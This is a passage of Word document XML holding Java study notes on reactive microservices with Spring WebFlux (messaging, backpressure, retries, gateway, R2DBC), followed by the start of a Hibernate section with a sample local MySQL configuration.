    <w:p w14:paraId="2BE90D95"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urn inventoryService.checkStock(request.getProductId())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BAE911"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filter(Boolean::booleanValue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8C0624"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switchIfEmpty(Mono.error(new RuntimeException("Out of Stock")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D49287"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flatMap(available -&gt; paymentService.processPayment(request.getPaymentDetails()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77064431"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46731572"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No thread blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A83D1"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Backpressure supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FB4C1"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Cleaner control flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16762310" w14:textId="77777777" w:rsidR="00413852"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0A757D3">
          <v:rect id="_x0000_i2387" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2BD336" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852"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3. Use Messaging for Asynchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25529383"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For loose coupling and fire-and-forget patterns, use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1DAB5"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se Spring Cloud Stream or Project Reactor-based libraries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386054F4"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treamListener("order-created")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A7F093"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void handleOrderCreated(Order order) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC532BC"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 reactively process message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B382F63"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257EC1AF" w14:textId="77777777" w:rsidR="00413852"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EE11703">
          <v:rect id="_x0000_i2388" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD90C74" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852"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4. Backpressure Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF6242"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f downstream services are slow, you can apply backpressure using Flux operators like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20294696"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limitRate()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A859C57"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onBackpressureBuffer()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CBAA1F"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onBackpressureDrop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4A2C0B" w14:textId="77777777" w:rsidR="00413852"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C3CB45E">
          <v:rect id="_x0000_i2389" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A889876" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852"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5. Retry, Timeout, and Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354DA116"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active streams make it easy to add resilience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E29A7FF"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ebClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1EEE21"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uri("/user/{id}", id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A231A6"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69574F9F"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bodyToMono(User.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559667F2"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retry(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E8469"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timeout(Duration.ofSeconds(2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA6D49"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 xml:space="preserve">    .onErrorResume(e -&gt; Mono.just(new User())); // fallback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF6BBF" w14:textId="77777777" w:rsidR="00413852"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E051BD">
          <v:rect id="_x0000_i2390" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365839C" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852"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6. Use API Gateway (Spring Cloud Gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876D002"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It’s built on WebFlux, so it fits reactive systems perfectly. You can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0116E2DA"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oute requests reactively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66097E10"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Apply filters (auth, logging, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153626D9"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upport WebSocket, SSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D1B83" w14:textId="77777777" w:rsidR="00413852"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BACA676">
          <v:rect id="_x0000_i2391" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9551C6" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852"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7. Database Integration with R2DBC / Reactive MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6EE2F6"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Use reactive DB drivers to complete the end-to-end reactive chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F05BC87"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E539F"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public interface UserRepository extends ReactiveCrudRepository&lt;User, String&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687AC6A9"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Flux&lt;User&gt; findByActive(boolean active);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492441AC"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF83C21" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00000000" w:rsidP="00B13F8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97ADECC">
          <v:rect id="_x0000_i2392" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64276CE4" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">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01"/>
        <w:gridCol w:w="3464"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="6B7D4E8E" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57895BCA" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="0041385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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B9342FA" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852" w:rsidP="00B13F85">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reactive Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="72C4C32F" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="413B8057"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ST communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22B77308"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WebClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="7B013963" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0180D4A5"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Messaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="466A6714"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Kafka, RabbitMQ with Project Reactor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="311E247B" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79038F6F"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Database integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18A29AED"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2DBC, ReactiveMongo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="242295C3" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C6A46DE"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Error handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="442D97BA"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onErrorResume, retry, timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="08B4CD4E" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DD80F7D"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Resilience &amp; flow control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44D70A59"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Backpressure + circuit breakers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="39CB5948" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B34DC11"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Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55EB2A87" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852" w:rsidP="00B13F85">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring Cloud Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D87224D" w14:textId="6FF6A754" w:rsidR="00712F11" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004A410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12E3DF2">
          <v:rect id="_x0000_i2393" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00712F11" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D395CCA" w14:textId="43B580FE" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="00F80B96" w:rsidP="005C6E50">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="540" w:name="_Toc196308020"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="540"/>
    </w:p>
    <w:p w14:paraId="798AC231" w14:textId="01F6C8C0" w:rsidR="00AF0B20" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF0B20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="541" w:name="_Toc196308021"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">How data is persisted in </w:t>
      </w:r>
      <w:r w:rsidR="009655F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> by using hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="541"/>
    </w:p>
    <w:p w14:paraId="3E0CA4B9" w14:textId="1D4F9125" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Hibernate is an ORM (Object-Relational Mapping) framework that simplifies database operations in Java applications. Here's how data gets persisted to a database using Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F3B01" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1. Configuration Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157927E" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>First, configure Hibernate to connect to your database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087E4E67"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;!-- hibernate.cfg.xml --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7092699B"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;hibernate-configuration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEA553F"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sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;session-factory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D52822"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;!-- Database connection settings --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37715673"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sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;property</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"hibernate.connection.driver_class"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>com.mysql.jdbc.Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E592A"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sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;property</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"hibernate.connection.url"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>jdbc:mysql://localhost:3306/mydb</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F5C80"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sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;property</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"hibernate.connection.username"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C75D6"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sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;property</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
